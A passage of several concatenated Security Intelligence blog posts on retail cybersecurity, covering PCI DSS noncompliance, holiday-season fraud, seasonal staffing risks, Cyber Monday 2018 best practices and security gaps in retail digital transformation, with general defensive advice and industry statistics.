Despite the establishment of the Payment Card Industry Data Security Standard (PCI DSS) in 2004, SecurityScorecard found that many retailers are largely ignoring it. More than 90 percent of the retail domains analyzed indicated noncompliance with the regulation. Retailers in violation of PCI compliance face steep financial penalties if they are breached.

“As organizations assess their compliance with PCI DSS, they must be able to detect, remediate and recover from any threats or vulnerabilities adding risk to unauthorized access to CDE,” said Khalil in response to the findings.

Listen to the podcast: Examining the State of Retail Security

The Customer Experience Trumps Retail Security

Convenience and the user experience have always contributed to poor retail app security, noted Ron Schlecht, managing partner at cybersecurity consulting firm BTB Security.

“The focus is so much on how technology fills or creates business value, that security is oftentimes an afterthought,” he said. “The only true way to get ahead of this issue in this industry and to protect itself from an increasing level of sophistication in attacks is executive buy-in to the issue, as well as a cohesive security strategy at each organization to make this a priority.”

In an extremely competitive sales landscape, retailers still place precedence on what users want, and front-end ease of transaction wins over back-end retail app security. As a result, according to Mike Wilson, chief technology officer (CTO) of PasswordPing, merchants are reluctant to implement security measures that could get in the way of making a sale.

“Any ‘fraud-proof’ e-commence solution would need to include so many obstacles to block bad actors that real customers would find it practically impossible to complete a transaction,” said Wilson. “Many industries are able to apply security solutions that add some friction to their user experience in exchange for better security, but the retail industry knows that their consumers will go elsewhere if it’s not a seamless experience.”

Attackers Exploit Poor Security Awareness in Retail

Retailers have historically displayed little awareness about security. Despite numerous high-profile breaches over the years that have impacted major merchants, that dearth of understanding continues to cause problems.

The SecurityScorecard report noted that social engineering scams that target retailers are on the rise and ranked the industry last in security against such threats. As retail becomes increasingly digital, this trend could become even worse.

“The way we shop has changed drastically in the last few years,” said Migo Kedem, senior director of product at SentinelOne. “Retail is traditionally a low-tech business. The new technology brings new security challenges, and these ‘digital shoplifters’ can’t be simply scared away using security sensors. The current way of life requires a different security approach that can protect your assets from cyberthreats.”

Scott Swenka, an IT security specialist working for a large grocery chain, believes a lack of security-minded leadership is causing the industry to fall behind others when it comes to risk mitigation.

“They lag behind because most public retail organizations have boards that are built out of retailed-based leaders and simply do not have an understanding of technology and how it affects them,” he said.

How Can Retailers Catch Up?

While PCI does not appear to have improved security in retail, regulations that target point-of-sale (POS) systems have the potential to make a measurable impact in the future, said Jim Barkdoll, CEO at security vendor TITUS.

“Regulation will force the necessary cultural shift in how retailers approach security,” he predicted. “Even those that have had a breach tend to relax their focus on security practices after the public attention around their breach wanes, driving long-term security investments lower on their list of priorities. Regulation changes that and will force a continued and consistent adherence to security policies and practices.”

Security leaders at retail organizations can address this problem by practicing secure development and operations (DevSecOps) and monitoring emerging threats in the digital landscape. If developers build retail apps with security baked in from the beginning of the development process, retail systems will gradually become more secure from the ground up.

Data should be encrypted during system communication and storage, and apps should employ authentication between the app and its servers. Apps should also require customer authentication via factors such as one-time passwords (OTP) and biometrics.

As is the case in many industries, most retail organizations prioritize innovation and customer retention before security. But as consumers become more concerned about their own digital security and privacy, retailers must invest in new security technologies and practices and lean on industry experts to help build secure systems.

Listen to the podcast: Examining the State of Retail Security

The post Why Is the Retail Industry Still Lacking Security? appeared first on Security Intelligence.

Retail Security Hygiene: The Case for Seasonal Checkups

The winter holidays offer big potential for retailers, with some companies earning around 30 percent of their annual revenue during the season, according to the National Retail Federation. Big sales numbers, however, also drive increased risks of fraud and theft, and businesses are now spending on extra security measures to keep physical stores safe.

But this is only half the battle. With retail stores moving online and hiring seasonal staff to bridge the holiday gap — not to mention handling employees who are more focused on holiday breaks than network breaches — it’s worth taking stock of retail security hygiene and revisiting how to protect consumer data from opportunistic cybercriminals.

Here’s how a seasonal hygiene checkup can help mitigate three top retail risks.

Fight E-Commerce Fraud During the Holiday Season

Online fraud jumps during the holiday season. As reported by PYMNTS, while total transactions rose 19 percent, online fraud increased by 22 percent from Thanksgiving to the end of 2017. There’s no single point of fraud failure across retail e-commerce stores, but threat actors continue to prioritize phishing emails as the primary point of compromise. If attackers can convince customers or employees to open attachments or follow malicious links, both purchase fraud and network infection are possible.

So how can companies assess their current security hygiene around e-commerce? It starts with simple questions: What do common attacks look like? What are the likely threat vectors? What are the potential costs? If retail organizations aren’t sure of the answers, they’ve got work to do. As U.S. Attorney Erin Nealy Cox wrote in Forbes, companies should create common threat profiles that allow IT teams to focus on vulnerable areas and develop specific countermeasures.

Simple processes — such as locking accounts after multiple failed login attempts and putting a limit on multiple purchases made over short timespans — can help, but it’s also a good idea to leverage automated, real-time fraud detection solutions to help identify attack patterns and reduce total risk.

Seasonal Staffing Concerns

To handle seasonal crowds without compromising customer service, many organizations hire extra staff during the holidays. According to Retail Dive, experts predict that retailers will bring on 650,000 seasonal employees to help offset consumer demand this year. To do their jobs, seasonal workers need access to point-of-sale (POS) networks, checkout systems and any mobile applications used by the company. This is the next hygiene shortfall for many companies: Hiring new employees without effective security onboarding and offboarding.

Consider a staff member who receives access to POS systems that are connected to back-end corporate networks. Inadequate training has them leaving sessions open and sharing passwords with co-workers, while minimal offboarding means they may retain login details and/or remain on internal permissions lists. As noted by Channel Partners Online, better security in this case starts with segmentation: POS and other sales systems should always be logically separated from other network services to prevent unintentional — or malicious — compromise.

Identity and access management (IAM) tools are also critical. IT teams need a way to control access for all retail workers — even those employed for only a few months — at a granular level to help protect consumer financial data and corporate intellectual property (IP). By assigning seasonal workers access roles with privileges that allow the completion of day-to-day tasks but don’t permit extraneous activity, retailers can boost both in-store and online security. Additionally, IAM solutions make it easy for network administrators to remove seasonal accounts and privileges when the holidays are over.

How to Protect Consumer Data From Insider Threats

No seasonal security checkup is complete without taking stock of internal employee risks. While Security Magazine noted that 75 percent of these insider threats are accidental, they’re no less risky to retail bottom lines, especially if users accidentally give threat actors complete access to network resources.

Improving security starts with a look at employee time off. Are workers putting in extra hours, pulling double shifts or working straight through the holidays? As noted by Harvard Business Review, 94 percent of employees who take time off for vacation come back to work with more energy and a better outlook. This may not be possible for retail companies during the holiday season, in turn lowering productivity and putting organizations at risk. It’s also worth assessing the number of employees working from home. As the holidays approach and weather gets worse, more and more employees may opt for home offices instead of slippery commutes. But are they logging into network services safely?

The first step for better internal security is to implement two-factor authentication (2FA). This practice helps reduce the chance of accidental logins and limits the ability of threat actors to compromise networks if less-than-productive employees have clicked on infected links or opened malware-laden attachments. It’s also a good idea to invest in virtual private networks (VPNs) and other network safeguards to help prevent bad actors from eavesdropping on remote workers. Email management solutions, meanwhile, can prevent messages with sensitive attachments from leaving secure corporate environments.

Give the Gift of a Security Hygiene Checkup

With the winter holiday season already upon us, retail companies would be wise to conduct a quick, but thorough security hygiene checkup. Start as early as possible to make it easier to identify key threats across e-commerce systems, seasonal staffing policies and employee behaviors. Then, develop a formal process to address these issues and improve security outcomes. This prevents security best practices from sitting on a shelf while retail risks rack up, and provides a blueprint for technology deployment and implementation.

Listen to the podcast: Examining the State of Retail Security

The post Retail Security Hygiene: The Case for Seasonal Checkups appeared first on Security Intelligence.

Cyber Monday 2018: 5 Best Practices to Protect Consumer Data

Cyber Monday is coming. Last year, the online shopping event generated $6.6 billion, according to Forbes, and marked “the largest online shopping day in U.S. history.” According to CNBC, consumer spending is up strongly this year, suggesting that Cyber Monday 2018 could be another record-breaker.

Given the sheer number of customers, websites and companies that drive Cyber Monday success, consumers and businesses need to make sure security doesn’t get lost in the hustle and bustle. Cybercriminals are hoping that in all the commotion they can compromise user accounts, infect corporate websites and crack business networks.

With customers expecting both great sales and solid security, organizations must improve their data protection practices and implement effective defense strategies ahead of the online onslaught.

Listen to the podcast: The State of Retail Cybersecurity Ahead of the 2018 Holiday Season

Why Retailers Must Adapt to the Evolving Landscape

Although Cyber Monday only started in 2005, the online sales frenzy has almost caught up to Black Friday in sheer sales numbers. Increasing familiarity with e-commerce stores and trust in digital transactions are paving the way. Fortune reported that more than 174 million Americans shoppers participated both online and in-store over the last Black Friday/Cyber Monday weekend — meaning that opportunities abound for attackers across platforms.

It’s up to retailers to justify and preserve the comfort levels that are driving their success. If cybercriminals are able to infiltrate smartphones and desktops with malware and phishing emails, consumers may unwittingly hand over account credentials and financial information. If companies can’t secure e-commerce portals, fraudsters could gain visibility into all transactions or place fraudulent orders and charge them to unsuspecting customers.

For retail companies, the trend is clear: Cyber Monday interest is on the rise among both consumers and criminals, meaning it’s no longer an option to post great deals without great security to back them up. Now, the holiday season calls for greater cybersecurity vigilance than ever, supported by evolving information security best practices for retailers.

Watch for This Year’s Most Common Scams

According to ACI Worldwide, fraud attempts are projected to increase 14 percent between Thanksgiving and Cyber Monday, with the average cost of fraudulent transactions rising 3 percent to $243. Meanwhile, the firm forecast the volume of purchases to increase by 18 percent as values rise by 19 percent.

Since more is at stake than ever for shoppers and retailers this season, cybercriminals are also varying their approaches, opting for omnichannel attacks across e-commerce sites, call centers, email accounts and in-store pickup programs, according to ACI Worldwide.

TechRadar reported that phishing attacks still account for half of all online fraud. That’s simply because they work: Well-crafted emails that convey a sense of urgency and create an emotional response can fool even experienced cybershoppers.

Meanwhile, Security Boulevard reported that threat actors also like to eavesdrop on insecure Hypertext Transfer Protocol (HTTP) sites and Wi-Fi to steal credentials and account information, leverage compromised devices to install keyloggers, and typosquat to create domain names that are very similar to popular Cyber Monday sites to collect and monetize consumer information.

5 Steps to Optimize Cyber Monday 2018 Protection

All the usual advice for consumer protection on Cyber Monday applies: Don’t save financial information on websites, watch out for email scams and avoid deals that are too good to be true. But retailers must hold up their end of the security deal as well.

Here are some security best practices for retailers to implement to keep consumers safe and protect corporate networks during the post-Thanksgiving shopping rush.

1. Account for Time

As noted by Forbes, cyberattackers don’t keep regular business hours. As a result, fraud rates may rise during off-peak traffic hours when there are fewer consumers shopping, but also fewer security personnel on duty.

Retailers should consider adding extra information security staff for the holiday season or implementing additional fraud checks for purchases made from different countries or after usual business hours.

2. Limit Purchase Velocity

Speed is another way malicious actors attempt to defraud Cyber Monday retailers. Instead of making high-value transactions that may be flagged as suspicious, attackers often make high-volume transactions — up to 10 times more quickly than legitimate users — to generate greater revenue.

Here, machine learning tools are invaluable assets to help identify and eliminate rapid-fire transactions.

3. Authenticate Users

Authentication is critical to Cyber Monday security. With many users still using weak passwords across websites — many of which are stolen in phishing scams — retail companies should implement two-factor authentication (2FA) wherever possible. Even low-friction options such as email or mobile codes can significantly reduce fraud and boost consumer confidence.

4. Separate Infrastructure

With many retail merchants now deploying both online and in-store sales to capture customer attention across Thanksgiving weekend, there’s an emerging need to separate point-of-sale (POS) and corporate infrastructure. This ensures that in-store device breaches don’t compromise e-commerce sites, and vice versa.

5. Manage Permissions

Who has access to what, when and why? Threat actors often exploit the chaos associated with Cyber Monday to infiltrate networks, install keyloggers and wait. It’s time for retailers to implement effective identity and access management (IAM) solutions that permit granular, permissions-based assignments of roles and responsibilities to foil criminal attempts to breach corporate systems.

Attackers are gearing up for one of the most lucrative days of their year on Cyber Monday. For retailers, the combination of increased consumer spending and security expectations demands stringent security practices that account for common threat vectors, prioritize user authentication, separate infrastructure and effectively manage permissions inside and outside the enterprise.

Listen to the podcast: The State of Retail Cybersecurity Ahead of the 2018 Holiday Season

The post Cyber Monday 2018: 5 Best Practices to Protect Consumer Data appeared first on Security Intelligence.

Retail Cybersecurity Is Lagging in the Digital Transformation Race, and Attackers Are Taking Advantage

Digital transformation is dominating retailers’ attention — and their IT budgets. As a result, significant gaps in retail cybersecurity are left unfilled just as retail IT faces new challenges, from infrastructure moving to the cloud without clear security policies to an array of new threat vectors focused on personal customer information, ransomware and underprotected business-to-business (B2B) connections.

Just as with line-of-business functions like merchandising and operations, retailers’ cybersecurity functions must undergo a digital transformation to become more holistic, proactive and nimble when protecting their businesses, partners and customers.

Retailers Aren’t Prioritizing Security, and Attackers Are Exploiting the Gaps

According to the retail edition of the “2018 Thales Data Threat Report,” 75 percent of retailers have experienced at least one data breach in the past, with half seeing a breach in the past year alone. That puts retail among the most-attacked industries as ranked by the “2018 IBM X-Force Threat Intelligence Index.”

Underfunded security infrastructure is likely a big reason for this trend; organizations only dedicated an average of around 5 percent of their overall IT budgets to security and risk management, according to a 2016 Gartner report.

While retailers have done a great job addressing payment card industry (PCI) compliance, it has come at a cost to other areas. According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, 78 percent of publicly disclosed point-of-sale (POS) malware breaches in 2017 occurred in the retail sector.

In addition to traditional POS attacks, malicious actors are targeting retailers with new threat vectors that deliver more bang for the buck, such as the following:

  • Personally identifiable information (PII) about customers — Accessible via retailers’ B2C portals, attackers use this information in bot networks to create false IDs and make fraudulent transactions. An increasingly popular approach involves making purchases with gift cards acquired via fraud.
  • Ransomware — Criminals are exploiting poorly configured apps and susceptible end users to access and lock up data, so they can then extract pricey ransoms from targeted retailers.
  • Unprotected B2B vendor connections — Threat actors can gain access to retail systems by way of digital connections to their partners. A growing target is a retailer’s B2B portals that have been constructed without sufficient security standards.

What Are the Biggest Flaws in Retail Cybersecurity?

These new types of attacks take advantage of retailers’ persistent underfunding of critical security defenses. Common gaps include inadequate vulnerability scanning capabilities, unsegmented and poorly designed networks, and using custom apps on legacy systems without compensating controls. When retailers do experience a breach, they tend to address the specific cause instead of taking a more holistic look at their environments.

Retailers also struggle to attract security talent, competing with financial services and other deeper-pocketed employers. The National Institute of Standards and Technology (NIST) reported in 2017 that the global cybersecurity workforce shortage is expected to reach 1.5 million by 2019.

In addition, flaws in governance make retailers more vulnerable to these new types of security threats. To keep up with rapidly evolving consumer demands, many line-of-business departments are adopting cloud and software-as-a-service (SaaS) solutions — but they often do so without any standardized security guidance from IT.

According to the “2017 Thales Data Threat Report,” the majority of U.S. retail organizations planned to use sensitive data in an advanced technology environment such as cloud, big data, Internet of Things (IoT) or containers this year. More than half believed that sensitive data use was happening at the time in these environments without proper security in place. Furthermore, companies undergoing cloud migration at the time of a breach incur $12 per record in additional costs, according to the “2018 Cost of a Data Breach Study.”

To protect their data, retailers need tools to both identify security threats and escalate the response back through their entire infrastructure, including SaaS and cloud services. But many enterprises lack that response capability. What’s more, the “Cost of a Data Breach Study” found that using an incident response (IR) team can reduce the cost of a breach by around $14 per compromised record.

Unfortunately, cybersecurity is not always on the radar in retailers’ C-suites. Without a regularly updated cybersecurity scorecard that reflects an organization’s current vulnerability to attack, senior executives might not regularly discuss the topic, take part in system testing or see cybersecurity as part of business continuity.

3 Steps to Close the Gaps in Your Security Stance

Time isn’t stopping as retailers grapple with these threats. Retail cybersecurity leaders must also monitor the General Data Protection Regulation (GDPR), where compliance requirements are sometimes poorly understood, as well as the emergence of artificial intelligence (AI) in both spoofing and security response. In addition, retailers should keep an eye on the continued uncertainty about the vulnerability of platform-as-a-service (PaaS), microservices, cloud-native apps and other emerging technologies.

By addressing the gaps in their infrastructure, governance and staffing, retailers can more effectively navigate known threats and those that will inevitably emerge. Change is never easy, but the following three steps can help retailers initiate digital transformation and evolve their current approach to better suit today’s conditions:

1. Increase Budgets

According to Thales, 84 percent of U.S. retailers plan to increase their security spending. While allocating these additional funds, it’s important for retailers to take a more holistic view, matching budgets to areas of the highest need. Understanding the costs and benefits of addressing security gaps internally or through outsourcing is a key part of this analysis.

2. Improve Governance

Enacting consistent security guidelines across internally run systems as well as cloud- and SaaS-based services can help retailers ensure that they do not inadvertently open up new vulnerabilities in their platforms. Senior-level endorsement is an important ingredient in prioritizing cybersecurity across the enterprise. Regular security scorecarding can be a valuable tool to keep cybersecurity at the top of executives’ minds.

3. Invest in MSS

A growing number of retailers have realized that starting or increasing their use of managed security services (MSS) can help them achieve a higher level of security maturity at the same price as managing activities in-house, if not at a lower cost. MSS allow retailers’ internal cybersecurity to operate more efficiently, address critical talent shortages and enable retailers to close critical gaps in their current security stance.

Why Digital Transformation Is Critical to Rapid Response

Digital transformation is all about becoming more proactive and nimble to respond to consumers’ rapidly growing expectations for seamless, frictionless shopping. Retailers’ cybersecurity efforts require a similar, large-scale transition to cope with new threat vectors, close significant infrastructure gaps and extend security protocols across new platforms, such as cloud and SaaS. By rethinking their budgets, boosting governance and incorporating MSS into their security operations, retail security professionals can support digital transformation while ensuring the business and customer data remains protected and secure.

Listen to the podcast

The post Retail Cybersecurity Is Lagging in the Digital Transformation Race, and Attackers Are Taking Advantage appeared first on Security Intelligence.